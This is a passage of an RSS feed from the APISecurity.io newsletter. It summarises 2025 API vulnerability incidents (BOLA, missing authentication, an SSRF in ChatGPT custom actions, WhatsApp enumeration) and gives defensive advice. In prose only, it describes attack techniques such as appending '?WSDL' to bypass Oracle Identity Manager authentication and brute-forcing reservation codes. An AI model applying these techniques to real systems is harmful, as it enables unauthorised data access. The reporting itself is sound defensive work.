<p style="font-weight: 400;"><span style="font-weight: 400;">Our most frequent API vulnerability this year was </span><b>Missing Authentication</b><span style="font-weight: 400;">. These are APIs that do not enforce authentication for sensitive operations, allowing anonymous users to access data or perform actions that should be restricted to authenticated users.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">In 2024, this was our fifth most reported vulnerability. In 2025, it rises to number one, accounting for 17 percent of all API incidents covered.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">One case from </span><a href="https://apisecurity.io/issue-267-ai-to-replace-pentesters-radware-threat-report-api-bugs-at-medefer-and-zitadel-api-holes-in-openbanking/" target="_blank" rel="noopener"><span style="font-weight: 400;">March</span></a><span style="font-weight: 400;"> illustrates the impact of missing authentication, when patient data in the UK healthcare system was reportedly exposed through an unauthenticated API. And in </span><span style="font-weight: 400;"><a href="https://apisecurity.io/issue-278-owasp-api-bugs-at-intel-teaforher-mcdonalds-optus-breach-fallout-apis-for-ai-agents/" target="_blank" rel="noopener">August</a>,</span><span style="font-weight: 400;"> we covered a similar issue at Intel, where a ‘getAccessToken’ API endpoint would return valid tokens without requiring any authentication. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Keeping track of your API endpoints and continually verifying authentication controls, both pre-production and in production, can help API teams catch and plug this vulnerability. </span></p>
<h2><span style="font-weight: 400;">Vulnerability #2: Broken Object Level Authorization </span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Broken Object Level Authorization, or </span><b>BOLA,</b><span style="font-weight: 400;"> was second on our list of frequent API incidents. BOLA occurs when an API fails to verify whether a user is permitted to access a specific object. Attackers exploit this authorization vulnerability by manipulating identifiers in API requests, such as user IDs, account numbers, or other resource identifiers, in an attempt to access other users&#8217; data. This has become a go-to tactic for API hackers and is something API developers should be aware of.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">We saw many cases of BOLA incidents in 2025. One example from our </span><a href="https://apisecurity.io/issue-280-solar-device-ato-attacks-smart-tvs-dumb-apis-password-reset-api-bugs-2025-developer-survey/" target="_blank" rel="noopener"><span style="font-weight: 400;">September</span></a><span style="font-weight: 400;"> issue involved Growatt inverters used in industrial and commercial solar-powered systems. A BOLA flaw in the API allowed hackers to take control of solar-powered IoT devices inside users’ homes. </span></p>
<p style="font-weight: 400;"><i><span style="font-weight: 400;">“</span></i><i><span style="font-weight: 400;">The flawed API accepts a device ID parameter without verifying whether the current user is authorized for that device, a textbook case of Broken Object Level Authorization”</span></i></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Also in </span><a href="https://apisecurity.io/issue-279-tax-records-leak-hacked-service-robots-frostbyte-at-us-stores-layer-7-api-attacks/" target="_blank" rel="noopener"><span style="font-weight: 400;">September</span></a><span style="font-weight: 400;">, we reviewed a researcher&#8217;s findings on a BOLA vulnerability in India’s Goods and Services Tax (GST) website. By manipulating API requests, users were able to access the tax information of private companies that should not have been accessible to them.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Authorization checks for individual resources are usually too fine-grained to offload to centralized platforms like API gateways or IAM products. So the responsibility sits with API developers to implement the proper checks at the API endpoint. </span></p>
<p><img fetchpriority="high" decoding="async" class="alignnone wp-image-11445" src="https://apisecurity.io/wp-content/uploads/2025/12/secureCoding_BOLA-300x60.png" alt="" width="700" height="140" srcset="https://apisecurity.io/wp-content/uploads/2025/12/secureCoding_BOLA-300x60.png 300w, https://apisecurity.io/wp-content/uploads/2025/12/secureCoding_BOLA-1024x206.png 1024w, https://apisecurity.io/wp-content/uploads/2025/12/secureCoding_BOLA-768x154.png 768w, https://apisecurity.io/wp-content/uploads/2025/12/secureCoding_BOLA.png 1160w" sizes="(max-width: 700px) 100vw, 700px" /></p>
<h2><span style="font-weight: 400;">Vulnerability #3: Excessive Data Exposure </span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">The majority of API data leaks we saw this year involved the exposure of unexpected or unauthorized properties in API responses. This aligns with OWASP’s </span><a href="https://owasp.org/API-Security/editions/2023/en/0xa3-broken-object-property-level-authorization/" target="_blank" rel="noopener"><span style="font-weight: 400;">API3:2023</span></a><span style="font-weight: 400;"> Broken Object Property Level Authorization (I think the earlier 2019 name, Excessive Data Exposure, still describes the issue more clearly). </span></p>
<p style="font-weight: 400;"><b>Excessive data exposure</b><span style="font-weight: 400;"> occurs when an API returns more properties than needed. This includes returning full objects or records when only a subset of fields is required, or failing to filter sensitive properties before sending a response.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">In </span><span style="font-weight: 400;"><a href="https://apisecurity.io/issue-272-volkswagen-api-hacked-api-flaws-in-instagram-tiktok-eli-attacks-radware-cisco-api-vulnerabilities/" target="_blank" rel="noopener">May</a>,</span><span style="font-weight: 400;"> we covered a case involving Volkswagen’s connected vehicle system. A researcher found that an API response returned information that the app didn’t need, including plaintext secrets and passwords. And in </span><span style="font-weight: 400;"><a href="https://apisecurity.io/issue-283-ai-security-solutions-formula-1s-api-flaw-latest-owasp-authorization-incidents/" target="_blank" rel="noopener">October</a>,</span><span style="font-weight: 400;"> we reported the case of a registration portal for Formula 1 drivers that leaked excessive data in an API response, giving researchers enough context to uncover a privilege escalation vulnerability. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">We agree with the OWASP guidance for preventing excessive data exposure: define and enforce the data returned by every API method through a schema-based or contract-based response validation mechanism. </span></p>
<p><img decoding="async" class="alignnone wp-image-11446" src="https://apisecurity.io/wp-content/uploads/2025/12/secureDesign_DataExposure-300x178.png" alt="" width="702" height="417" srcset="https://apisecurity.io/wp-content/uploads/2025/12/secureDesign_DataExposure-300x178.png 300w, https://apisecurity.io/wp-content/uploads/2025/12/secureDesign_DataExposure-768x457.png 768w, https://apisecurity.io/wp-content/uploads/2025/12/secureDesign_DataExposure.png 945w" sizes="(max-width: 702px) 100vw, 702px" /></p>
<h2><span style="font-weight: 400;">Vulnerability #4: Broken Function Level Authorization</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Most of the Broken Function Level Authorization (</span><b>BFLA</b><span style="font-weight: 400;">) incidents we covered this year were basic errors in role-based access control at the API operation level. These occurred when functions intended for privileged users were accessible to roles with less permissions. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">One example came from an </span><a href="https://apisecurity.io/issue-279-tax-records-leak-hacked-service-robots-frostbyte-at-us-stores-layer-7-api-attacks/" target="_blank" rel="noopener"><span style="font-weight: 400;">August</span></a><span style="font-weight: 400;"> report on Securden’s Privileged Account Management platform, where a sensitive password backup function was available to users who were not administrators. In our </span><a href="https://apisecurity.io/issue-267-ai-to-replace-pentesters-radware-threat-report-api-bugs-at-medefer-and-zitadel-api-holes-in-openbanking/" target="_blank" rel="noopener"><span style="font-weight: 400;">March</span></a><span style="font-weight: 400;"> issue, we highlighted similar issues in the Zitadel platform, where 12 admin-level API endpoints were open to non-admin users.  </span><span style="font-weight: 400;"><br />
</span><span style="font-weight: 400;"><br />
</span><span style="font-weight: 400;">Other common BFLA cases involved users being able to run specific API operations, such as PUT or DELETE, that should have been restricted to administrators.</span></p>
<h2><span style="font-weight: 400;">Vulnerability #5: Broken Authentication </span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">And finally, fifth on our list of the most common API vulnerabilities this year is </span><b>Broken Authentication</b><span style="font-weight: 400;">. This describes flaws where the authentication mechanism itself is poorly designed or implemented, allowing an API to accept requests without properly verifying the user.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">In </span><span style="font-weight: 400;"><a href="https://apisecurity.io/issue-272-volkswagen-api-hacked-api-flaws-in-instagram-tiktok-eli-attacks-radware-cisco-api-vulnerabilities/" target="_blank" rel="noopener">May</a>,</span><span style="font-weight: 400;"> we covered an issue in a Volkswagen mobile application where a one-time password validation API was vulnerable to brute force attacks. In </span><a href="https://apisecurity.io/issue-280-solar-device-ato-attacks-smart-tvs-dumb-apis-password-reset-api-bugs-2025-developer-survey/" target="_blank" rel="noopener"><span style="font-weight: 400;">September</span></a><span style="font-weight: 400;">, FlowiseAI, a platform for building AI agents, disclosed a flaw in its password reset process. The vulnerable API returned a reset token directly in the response, instead of following secure practices to send the token to a registered email address.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">We intentionally separated Missing Authentication from Broken Authentication to highlight how often API teams completely fail to enforce authentication. Though challenges also remain prominent with API authentication controls generally.</span></p>
<p>The post <a href="https://apisecurity.io/issue-286-the-apisecurity-io-top-5-api-vulnerabilities-in-2025/">Issue 286: The APISecurity.io Top 5 API Vulnerabilities in 2025</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 285: API hack at Avelo Airlines, 3.5 billion leak at WhatsApp, F5 API security survey, AI-generated code risks</title>
		<link>https://apisecurity.io/issue-285-api-hack-at-avelo-airlines-3-5-billion-leak-at-whatsapp-f5-api-security-survey-ai-generated-code-risks/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 27 Nov 2025 16:46:00 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=11428</guid>

					<description><![CDATA[<p>This week, we share news of API vulnerabilities affecting Avelo Airlines, WhatsApp, and Oracle, and an incident notification from OpenAI to API developers about potential information exposure. We also highlight a new survey from F5 on the role of API security in agentic AI systems. And to wrap up, we have an article examining the [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-285-api-hack-at-avelo-airlines-3-5-billion-leak-at-whatsapp-f5-api-security-survey-ai-generated-code-risks/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-285-api-hack-at-avelo-airlines-3-5-billion-leak-at-whatsapp-f5-api-security-survey-ai-generated-code-risks/">Issue 285: API hack at Avelo Airlines, 3.5 billion leak at WhatsApp, F5 API security survey, AI-generated code risks</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p style="font-weight: 400;"><span style="font-weight: 400;">This week, we share news of API vulnerabilities affecting Avelo Airlines, WhatsApp, and Oracle, and an incident notification from OpenAI to API developers about potential information exposure. We also highlight a new survey from F5 on the role of API security in agentic AI systems. And to wrap up, we have an article examining the risks from AI-generated software and what API teams need to know.</span></p>
<h2><span style="font-weight: 400;">Vulnerability: Massive API Data Exposure at Avelo Airlines </span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Security researcher Alex Schapiro reveals API flaws he found in Avelo Airlines’ reservation system that exposed millions of passenger records, including PII and payment-related data. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The main API vulnerability in this case was a broken authentication check. The API accepted a 6-character reservation code without also requiring the passenger&#8217;s last name. This allowed anyone with just a valid code to retrieve the corresponding record, without having to guess the relevant passenger&#8217;s name. To make matters worse, the API was “very generous” with the passenger data it returned.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The API also lacked rate-limiting controls, which allowed for brute force enumeration of all possible reservation codes, and by consequence, passenger records. The researcher included an eye-opening estimate of the cost to brute force all combinations, calculated at just $435 using AWS Lambda. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Broken authentication and excessive data exposure are serious API vulnerabilities on their own. But when combined with missing rate limits, the impact can really escalate, allowing sensitive data to be harvested at massive scale. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">These are important API security controls to get right. </span><a href="https://alexschapiro.com/blog/security/vulnerability/2025/11/20/avelo-airline-reservation-api-vulnerability" target="_blank" rel="noopener"><span style="font-weight: 400;">Read the report</span></a><span style="font-weight: 400;">.</span></p>
<h2><span style="font-weight: 400;">Vulnerability: 3.5 Billion WhatsApp Accounts Exposed</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Continuing on the topic of API rate limiting, researchers have shared a detailed report describing how they were able to exfiltrate 3.5 billion WhatsApp user phone numbers through a vulnerable API.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This is another API enumeration attack, though different from the Avelo Airlines case, because in this instance, the API behaved as intended. Social media platforms often provide lookup services that allow users to find other accounts and search for friends. But that search function can also be abused for large-scale enumeration attacks. Beyond social media, we’ve seen similar cases before, including the </span><a href="https://apisecurity.io/issue-240-spoutible-api-leakage-15m-trello-profiles-scraped-api-secret-tokens-leaked/" target="_blank" rel="noopener"><span style="font-weight: 400;">Trello incident</span></a><span style="font-weight: 400;"> that exposed the information of over 15 million users, again through a vulnerable search API. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The </span><a href="https://github.com/sbaresearch/whatsapp-census/blob/main/Hey_there_You_are_using_WhatsApp.pdf" target="_blank" rel="noopener"><span style="font-weight: 400;">original research</span></a><span style="font-weight: 400;"> highlights the challenge of allowing legitimate users to perform a high volume of lookups while at the same time preventing abuse and exfiltration of massive data sets. The solution requires some sophistication to distinguish normal from abnormal user behavior. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Part of the challenge is also that the value of these attacks is not necessarily in the data retrieved about any individual user, but more in the large volume of data. At scale, the data becomes highly valuable for use in automated phishing attacks or fraud. So these incidents demonstrate the need for carefully considered API rate-limiting strategies that balance intended user experience with the risks of API enumeration vulnerabilities. </span><a href="https://www.csoonline.com/article/4093249/whatsapp-flaw-allowed-discovery-of-the-3-5-billion-mobile-numbers-registered-to-the-platform.html" target="_blank" rel="noopener"><span style="font-weight: 400;">Read the article</span></a><span style="font-weight: 400;">.</span></p>
<h2><span style="font-weight: 400;">Incident: Risks from OpenAI’s API Developer Platform </span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">A quick note on something that popped up in my inbox today. OpenAI is notifying developers about a security incident that may have exposed private information for users of the OpenAI API development platform.</span></p>
<p><img decoding="async" class=" wp-image-11429 aligncenter" src="https://apisecurity.io/wp-content/uploads/2025/11/platform.openai.com_-300x163.png" alt="" width="600" height="326" srcset="https://apisecurity.io/wp-content/uploads/2025/11/platform.openai.com_-300x163.png 300w, https://apisecurity.io/wp-content/uploads/2025/11/platform.openai.com_-1024x557.png 1024w, https://apisecurity.io/wp-content/uploads/2025/11/platform.openai.com_-768x418.png 768w, https://apisecurity.io/wp-content/uploads/2025/11/platform.openai.com_.png 1425w" sizes="(max-width: 600px) 100vw, 600px" /></p>
<p style="font-weight: 400; text-align: center;"><i><span style="font-weight: 400;">platform(dot)openai(dot)com</span></i></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The issue appears to stem from a third-party vendor, Mixpanel, which OpenAI uses on the frontend of its API development site for analytics. OpenAI hasn’t shared details on the technical cause yet, but the incident report advises developers to stay alert for credible-looking phishing attempts or unusual emails.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">If you’ve done any API development or testing through OpenAI’s platform, this is one to keep an eye on. </span><a href="https://openai.com/index/mixpanel-incident/" target="_blank" rel="noopener"><span style="font-weight: 400;">Read the incident report.</span></a><span style="font-weight: 400;"> </span></p>
<h2><span style="font-weight: 400;">Vulnerability: API Routing Flaws in Oracle Identity Manager</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">While most API endpoints require authentication, some endpoints are deliberately excluded from this step. Skipping authentication is a common source of API vulnerabilities, and we see similar patterns in many previously reported cases.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">A recent example involves Oracle’s Identity Manager (OIM). In OIM, authentication is skipped for requests ending with the query string “</span><span style="font-weight: 400;">?WSDL”</span><span style="font-weight: 400;">. This is typically a request for a publicly available SOAP service description file, so skipping authentication in this case makes sense.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">However, a common coding mistake made the WSDL check too loose. Developers often use risky pattern checks such as “ends with” or “contains”, which are easily exploited. An attacker can just tack on “</span><span style="font-weight: 400;">?WSDL”</span><span style="font-weight: 400;"> to the end of any API request, tricking the API code into treating it as a public WSDL request and so bypassing authentication entirely.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">API authentication bypasses like this are common, so this is another vulnerability to watch out for. </span><a href="https://slcyber.io/research-center/breaking-oracles-identity-manager-pre-auth-rce/" target="_blank" rel="noopener"><span style="font-weight: 400;">Read the report</span></a><span style="font-weight: 400;">.</span></p>
<h2><span style="font-weight: 400;">Survey: Impact of API Vulnerabilities for AI Enablement</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">F5 has published a new survey report, &#8220;2025 Strategic Imperatives: Securing APIs for the Age of Agentic AI in APAC&#8221;. The survey looks at API security trends across organizations in the Asia Pacific region and the impact of API vulnerabilities on AI enablement strategies. </span></p>
<blockquote>
<p style="font-weight: 400;"><i><span style="font-weight: 400;">“APIs are now central to digital transformation, partner integration, and AI enablement in Asia Pacific”</span></i></p>
</blockquote>
<p style="font-weight: 400;"><span style="font-weight: 400;">APIs are key enablers of AI integrations and autonomous workflows. The report highlights how many OWASP API Top 10 API vulnerabilities align with organizational concerns around AI, as autonomous agents can amplify the impact of issues like API6:2023 “Unrestricted access to sensitive business flows” and also API4:2023 “Unrestricted resource consumption”. </span></p>
<p style="text-align: center;"><img loading="lazy" decoding="async" class="alignnone wp-image-11430" src="https://apisecurity.io/wp-content/uploads/2025/11/owasp-api-300x120.png" alt="" width="600" height="240" srcset="https://apisecurity.io/wp-content/uploads/2025/11/owasp-api-300x120.png 300w, https://apisecurity.io/wp-content/uploads/2025/11/owasp-api-1024x410.png 1024w, https://apisecurity.io/wp-content/uploads/2025/11/owasp-api-768x307.png 768w, https://apisecurity.io/wp-content/uploads/2025/11/owasp-api-1536x615.png 1536w, https://apisecurity.io/wp-content/uploads/2025/11/owasp-api-2048x820.png 2048w" sizes="auto, (max-width: 600px) 100vw, 600px" /></p>
<p style="font-weight: 400; text-align: center;"><i><span style="font-weight: 400;">2025 Strategic Imperatives: Securing APIs for the Age of Agentic AI in APAC</span></i></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The survey also found that API authentication and authorization remain the weakest links, with many teams struggling to find an effective solution for vulnerabilities such as API1 BOLA and API2 Broken Authentication. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Undocumented and unmanaged APIs are another major concern, with post-production techniques like code scanning and traffic-based detection proving inadequate, according to a majority of survey participants. Non-deterministic AI agents are likely to exacerbate these risks by automatically uncovering and exposing undocumented APIs.  </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This raises the urgency for API teams to address the root cause by adopting a pre-production approach: maintaining a fully documented, tracked and enforceable API inventory. </span><a href="https://itbrief.com.au/story/apac-ai-surge-exposes-critical-gaps-in-api-security-controls" target="_blank" rel="noopener"><span style="font-weight: 400;">Read the survey.</span></a></p>
<h2><span style="font-weight: 400;">Article: Deterministic Guardrails for AI-Generated Code</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Security has long played “second fiddle” to feature delivery, especially in API development, where new services and updates are pushed out at a breakneck pace with ever-shorter release cycles.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Now, with AI-generated code entering the mix, the question is: is the priority gap between security and time-to-market about to get better or a whole lot worse? That’s the question Ramya Murthy explores in a recent Medium article, and her conclusions are sobering.</span></p>
<blockquote>
<p style="font-weight: 400;"><i><span style="font-weight: 400;">“One in five organizations have already suffered material business damage from AI-generated code”</span></i></p>
</blockquote>
<p style="font-weight: 400;"><span style="font-weight: 400;">Murthy highlights a key limitation: AI often lacks context. It doesn’t understand an API’s business logic, regulatory requirements, or security policies. Instead, it generates code based on learned patterns, producing mixed results.</span></p>
<blockquote>
<p style="font-weight: 400;"><i><span style="font-weight: 400;">“45% of AI-generated code fails basic security checks”</span></i></p>
</blockquote>
<p style="font-weight: 400;"><span style="font-weight: 400;">From a security standpoint, AI can help teams to improve productivity through automation and rapid code generation. </span><span style="font-weight: 400;">But developers can’t rely on AI alone. Rigorous security checks and thorough testing will be essential to ensure AI-generated code meets organizational security policies and regulatory standards for APIs. </span><a href="https://medium.com/@ramyamurthy/the-perfect-storm-how-ai-generated-code-is-supercharging-the-cybersecurity-crisis-452cc831a08a" target="_blank" rel="noopener"><span style="font-weight: 400;">Read the article</span></a><span style="font-weight: 400;">.</span></p>
<p>The post <a href="https://apisecurity.io/issue-285-api-hack-at-avelo-airlines-3-5-billion-leak-at-whatsapp-f5-api-security-survey-ai-generated-code-risks/">Issue 285: API hack at Avelo Airlines, 3.5 billion leak at WhatsApp, F5 API security survey, AI-generated code risks</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 284: OWASP Top 10 2025, ChatGPT’s API Flaw, BOLA at Mercury Energy NZ, Leaky AI Companies</title>
		<link>https://apisecurity.io/issue-284-owasp-top-10-2025-chatgpts-api-flaw-bola-at-mercury-energy-nz-leaky-ai-companies/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 13 Nov 2025 12:43:22 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<category><![CDATA[api security]]></category>
		<category><![CDATA[GenAI]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=11421</guid>

					<description><![CDATA[<p>This week, we’re sharing some AI-related security news, with several reports highlighting vulnerabilities in trusted AI platforms. We also review a blog post claiming an API BOLA vulnerability at Mercury Energy New Zealand and cover a recent interview exploring a range of API security topics. First up though, news of a new OWASP Top 10 list [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-284-owasp-top-10-2025-chatgpts-api-flaw-bola-at-mercury-energy-nz-leaky-ai-companies/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-284-owasp-top-10-2025-chatgpts-api-flaw-bola-at-mercury-energy-nz-leaky-ai-companies/">Issue 284: OWASP Top 10 2025, ChatGPT’s API Flaw, BOLA at Mercury Energy NZ, Leaky AI Companies</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p style="font-weight: 400;"><span style="font-weight: 400;">This week, we’re sharing some AI-related security news, with several reports highlighting vulnerabilities in trusted AI platforms. We also review a blog post claiming an API BOLA vulnerability at Mercury Energy New Zealand and cover a recent interview exploring a range of API security topics. First up though, news of a new OWASP Top 10 list just released.</span></p>
<h2><span style="font-weight: 400;">Industry News: OWASP Top 10 2025 now available</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">A release candidate for the new OWASP Top 10:2025 vulnerability list is available from the OWASP website. This is the general OWASP Top 10 list, not the API-specific one. But there are a couple of notable trends that I think could also influence the next API vulnerability list. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">First, </span><b>Security Misconfigurations</b><span style="font-weight: 400;"> has been bumped up from #5 to #2, signaling that insecure or unexpected application behavior is increasingly caused by configuration issues rather than just coding flaws. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">That has important implications for security testing. Static Application Security Testing (SAST) tools that scan only source code may be blind to vulnerabilities introduced through configuration settings outside the application. These issues often only surface during manual configuration reviews or dynamic testing (assuming you can define upfront the expected behavior to test against), so the trends may warrant a shift in emphasis towards dynamic testing. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">There’s also a new entry: </span><b>Software Supply Chain Failures</b><span style="font-weight: 400;">. In the API space, this likely reflects the growing complexity of API ecosystems and their interdependencies. APIs today often act as just one node in a chain of upstream and downstream API calls, with LLMs and Model Context Protocols (MCPs) now thrown in for good measure as consumers and providers of API data. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">It’ll be interesting to see if this drives any movement in the OWASP API Security Top 10 list, particularly for API10:2023 “Unsafe Consumption of APIs” in its next release. </span><a href="https://owasp.org/Top10/2025/0x00_2025-Introduction/" target="_blank" rel="noopener"><span style="font-weight: 400;">Read the OWASP Top 10 introduction</span></a><span style="font-weight: 400;">.</span></p>
<h2><span style="font-weight: 400;">Vulnerability: Researcher Claims API Flaw at Mercury Energy NZ </span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">A recent blog post spotlights a potential API flaw at Mercury Energy in New Zealand, where broken object-level authorization (BOLA) may have allowed access to customer records. This type of API authorization vulnerability is a common root cause in API attacks and highlights the importance of enforcing strict access controls at every API endpoint. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">BOLA is often exploited by authenticated users who gain access to other users’ resources or data by manipulating resource identifiers used in API requests. To prevent it, API developers should add authorization checks to ensure that a user requesting access to a resource is the owner or has the right permissions. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Testing and validating that these authorization controls are in place and effective can help teams remove low-level authorization vulnerabilities that often carry very high risk. </span><a href="https://www.ki-wi.co.nz/mercury-energy-nz-api-exposed-customer-data-through-authorization-bypass" target="_blank" rel="noopener"><span style="font-weight: 400;">Read the post.</span></a></p>
<h2><span style="font-weight: 400;">Vulnerability: ChatGPT API Exposes Access Tokens </span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Security researcher Jacob Krut uncovered a high-severity API vulnerability in ChatGPT’s custom actions feature. It allows a custom GPT to connect to external tools and services by calling your own APIs to pull in additional context for an AI agent or LLM. It’s similar to Antrophics MCP protocol in effect. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The researcher found that instead of pointing to some benign external API, the custom actions feature would accept a URL for an internal API, allowing him to trick the system into returning data from its own file system, and sensitive data at that. This is a classic example of server-side request forgery (SSRF). You should always validate and restrict user-supplied data to an API.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">ChatGPT did appear to have some input validation in place to check the user-supplied URL, but it was limited. And with some tricks and hacking magic the researcher was able to launch a successful SSRF attack to access an internal metadata service on the hosting cloud platform, and ultimately generate privileged access tokens for Azure management API , the proverbial keys to the kingdom! </span><a href="https://cybersecuritynews.com/chatgpt-hacked-using-custom-gpts/" target="_blank" rel="noopener"><span style="font-weight: 400;">Read the researchers full report.</span></a><span style="font-weight: 400;"> </span></p>
<h2><span style="font-weight: 400;">Vulnerability: Risk from AI Products</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Cybersecurity firm Wiz recently found critical vulnerabilities in the Github repositories of some of the biggest and most influential AI companies on the </span><span style="font-weight: 400;">Forbes AI 50</span><span style="font-weight: 400;"> list. API Keys, access tokens, credentials, but also model data that can reveal insights about the training data used by these AI systems. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Leaked credentials from Github and other public repositories aren&#8217;t exclusive to AI companies. It’s been a recurring problem across industries for years. I came across a similar case we reported on in this </span><a href="https://apisecurity.io/issue-31-samsung-smartthings-repo-token-leaks-facebook-fined-api-vulnerability/" target="_blank" rel="noopener"><span style="font-weight: 400;">newsletter</span></a><span style="font-weight: 400;"> from 2019, and there have been many others since then. It’s clearly a systemic issue for collaborative software development in general.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">That said, AI tools and platforms are increasingly embedded across organizations in software development, testing, and critical business workflows. So any compromise of these tools can have an outsized impact. And with the growing popularity and adoption of MCP servers, AI platforms are also moving into the critical paths of organizations service and data delivery. So vulnerabilities in these AI platforms can quickly spread across systems to multiply risk and business impact. Thread carefully with AI enablement.  </span><a href="https://www.thedailyjagran.com/technology/report-claims-major-ai-firms-including-perplexity-and-anthropic-may-have-exposed-sensitive-data-on-github-10279317" target="_blank" rel="noopener"><span style="font-weight: 400;">Read the news article</span></a><span style="font-weight: 400;">.</span></p>
<h2><span style="font-weight: 400;">Article: API Risk is a board-level business continuity issue</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">A discussion on Betanews about the risks from APIs as the fastest growing class of security incidents is worth a read. It covers a range of different topics from the impact of Agentic AI on API security, to the essentials of an API-first security strategy, to the impact of a single API vulnerability on the broader supply chain.</span></p>
<p style="font-weight: 400;"><i><span style="font-weight: 400;">“APIs are not just developer conveniences, they are business-critical assets that demand the same rigor as financial systems or customer databases”</span></i></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">In the article, Scott Wheeler talks about the need for organizations to make API security central to their overall architecture, and to integrate security into the very design and development of APIs, rather than waiting until they’re already out in the world, when it’s too late.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">There’s also a discussion on using behavior-based threat detection to identify out of bounds behavior. That’s certainly an improvement on the traditional signature-based defenses of a WAF or Gateway, but behavioral-detection based on machine learning language often struggles to keep up with the pace of API delivery and rates of API updates, since those tools require constant retraining to keep up. During that time the API traffic is essentially unprotected.  </span></p>
<p style="font-weight: 400;"><i><span style="font-weight: 400;">“Once the scope is understood, the priority becomes shifting security left, embedding protection into the design and development lifecycle rather than bolting it on after deployment”</span></i></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">A security-by-design first approach for APIs that evolves along with API development is essential, to build APIs that are reliable data providers for AI models, as well as resilient to the unprecedented speeds of AI-powered attacks. </span><a href="https://betanews.com/2025/11/03/when-apis-become-the-enterprise-backdoor-securing-ais-most-vulnerable-link-qa/" target="_blank" rel="noopener"><span style="font-weight: 400;">Read the article</span></a><span style="font-weight: 400;">. </span></p>
<p>The post <a href="https://apisecurity.io/issue-284-owasp-top-10-2025-chatgpts-api-flaw-bola-at-mercury-energy-nz-leaky-ai-companies/">Issue 284: OWASP Top 10 2025, ChatGPT’s API Flaw, BOLA at Mercury Energy NZ, Leaky AI Companies</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 283: AI Security Solutions, Formula 1’s API Flaw, Latest OWASP Authorization Incidents</title>
		<link>https://apisecurity.io/issue-283-ai-security-solutions-formula-1s-api-flaw-latest-owasp-authorization-incidents/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 30 Oct 2025 15:27:45 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<category><![CDATA[api security]]></category>
		<category><![CDATA[API vulnerabilities]]></category>
